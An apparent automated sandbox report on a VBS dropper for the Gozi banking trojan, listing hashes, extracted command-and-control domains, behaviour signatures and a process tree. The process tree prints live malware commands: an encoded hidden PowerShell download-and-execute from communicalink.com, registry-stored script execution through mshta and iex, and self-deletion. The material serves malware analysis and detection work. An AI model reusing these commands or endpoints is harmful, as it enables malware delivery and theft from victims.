Analysis
-
max time kernel
138s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
-
submitted
07-10-2023 11:32
General
-
Target
8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs
-
Size
22KB
-
MD5
3dd859f7aa6f95b80aae2c7c4b5eaaf9
-
SHA1
3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
-
SHA256
8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
-
SHA512
9552049edd58c22dac6f081c110eaebbcc23f0c28e3544c8387da5a1be376fbf0b7c777a95bc1277c5246f8588be7632fd9f335d428bdc58864c870d04d9f994
-
SSDEEP
384:GOjk+QtGIKg7ETp2FHIKIGZVgXFpmcMYqYaGmPUVdE/MMMWm4qVuAL:I9eYjTT//0MjgVuAL
Malware Config
Extracted
http://communicalink.com/index.php
Extracted
gozi
Extracted
gozi
5050
mifrutty.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
http://igrovdow.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Gozi
Gozi is a well-known and widely distributed banking trojan.
-
Blocklisted process makes network request 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IGLae.exe"C:\Users\Admin\AppData\Local\Temp\IGLae.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3620 -s 4725⤵
- Program crash
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tli6='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tli6).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD\\\LinkActive'));if(!window.flag)close()</script>"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name qqffurbc -value gp; new-alias -name inorskcfl -value iex; inorskcfl ([System.Text.Encoding]::ASCII.GetString((qqffurbc "HKCU:Software\AppDataLow\Software\Microsoft\2B8EB0FA-8E4D-9577-F08F-A2992433F6DD").PlayPlay))2⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\typks0nw\typks0nw.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEFA0.tmp" "c:\Users\Admin\AppData\Local\Temp\typks0nw\CSCA6B29E7117D34C76817275B39401F4E.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4xev0lq4\4xev0lq4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF08A.tmp" "c:\Users\Admin\AppData\Local\Temp\4xev0lq4\CSC40E926FB11EF4E49828B4B7C98FC8B22.TMP"4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\IGLae.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost -n 52⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3620 -ip 36201⤵
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\IGLae.exeFilesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
C:\Users\Admin\AppData\Local\Temp\IGLae.exeFilesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
C:\Users\Admin\AppData\Local\Temp\IGLae.exeFilesize
274KB
MD5d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA105263b9ec69fcf48cc71443ba23545fabe21df12
SHA256911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA5124629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
-
C:\Users\Admin\AppData\Local\Temp\RESEFA0.tmpFilesize
1KB
MD55b6a0f6d248ced98fc9862a398f2ff7e
SHA1c288fce24fc68220b50c52ae8b17229c75ad6190
SHA256cc4d10b9d9e6aedbdf3c6823010c8014f1bf16ad18740364ae93f0d497307443
SHA51265f5852c521abf50b4342d07efb2c41ef6d2e66b1ee2909aa1beec63b7914e30477528c6497aed9e459b465cb207dc1a4a623ac480a8bc0a15af3b9c1702e047
-
C:\Users\Admin\AppData\Local\Temp\RESF08A.tmpFilesize
1KB
MD52df6e9ed31a1ba8a0395c2192d5214b3
SHA10060250e0b29e71d2a6cb52d318d02e8b8b5a2db
SHA256b1561237d4b3b914c1fe804527b3ce70256e94263bcf81d1628aae98b14885f4
SHA512ee2b4a160026c03a2962393b583ec9cad21595d243ac60fbc0e42f7ff405662dba02b1ee57640b96dff9a8c859ee3cc1fed6f93ca0ff909e5b8db40c5901923a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2akhyvoo.io4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\c:\Users\Admin\AppData\Local\Temp\4xev0lq4\CSC40E926FB11EF4E49828B4B7C98FC8B22.TMPFilesize
652B
MD5b459436821c73ca4c3bf23480317c79c
SHA17ceb43fb9a73541ead623210658443aba6c0161c
SHA256d48e48b6b8679f4e96bbd284431710e637018cd3347a530268120c90448c2774
SHA512e09d60070b51defd451a29205e1f07c602f13d540122f8632b6057d156f42bea3b118c3eb2b39819cfef74e1be5f061af38ea689e0f4eabd02e0bf7c09afa02c
-
\??\c:\Users\Admin\AppData\Local\Temp\typks0nw\CSCA6B29E7117D34C76817275B39401F4E.TMPFilesize
652B
MD55ee24d9168e4f9f7c59777242c252f63
SHA111c05c965e34c4ff4b42718347683da06272bbda
SHA256aa4e95213ca80d6b5fe7cbd5fbb0c7c1e0b2b291e8e711a227290eecb8f2177f
SHA5124ed9b70bbc4dfb0acce0a3cb86a5e0823d27c9f51b235095ebfa381b5b9157d548011087d9736c60d0332f116bab8cee54634dca6e337f8e0d3b68d23087aa6c
-
memory/812-49-0x00000218F90B0000-0x00000218F9154000-memory.dmpFilesize
656KB
-
memory/3620-32-0x00000000025B0000-0x00000000026B0000-memory.dmpFilesize
1024KB
-
memory/3620-26-0x00000000025B0000-0x00000000026B0000-memory.dmpFilesize
1024KB
-
memory/3620-27-0x0000000002530000-0x000000000253B000-memory.dmpFilesize
44KB
-
memory/3620-28-0x0000000000400000-0x000000000228B000-memory.dmpFilesize
30.5MB
-
memory/3620-29-0x0000000002560000-0x000000000256D000-memory.dmpFilesize
52KB
-
memory/3620-62-0x0000000000400000-0x000000000228B000-memory.dmpFilesize
30.5MB
-
memory/3620-33-0x0000000000400000-0x000000000228B000-memory.dmpFilesize
30.5MB
-
memory/3620-34-0x0000000002530000-0x000000000253B000-memory.dmpFilesize
44KB
-
memory/4444-59-0x0000000000FE0000-0x0000000001078000-memory.dmpFilesize
608KB
-
memory/5008-0-0x0000012762E40000-0x0000012762E62000-memory.dmpFilesize
136KB
-
memory/5008-10-0x00007FF9BB190000-0x00007FF9BBC51000-memory.dmpFilesize
10.8MB
-
memory/5008-11-0x0000012762940000-0x0000012762950000-memory.dmpFilesize
64KB
-
memory/5008-12-0x0000012762940000-0x0000012762950000-memory.dmpFilesize
64KB
-
memory/5008-24-0x00007FF9BB190000-0x00007FF9BBC51000-memory.dmpFilesize
10.8MB
-
memory/5008-13-0x0000012762940000-0x0000012762950000-memory.dmpFilesize
64KB
-
memory/5096-55-0x00000247A9660000-0x00000247A9661000-memory.dmpFilesize
4KB
-
memory/5096-54-0x00000247A9860000-0x00000247A9904000-memory.dmpFilesize
656KB
-
memory/5096-63-0x00000247A9860000-0x00000247A9904000-memory.dmpFilesize
656KB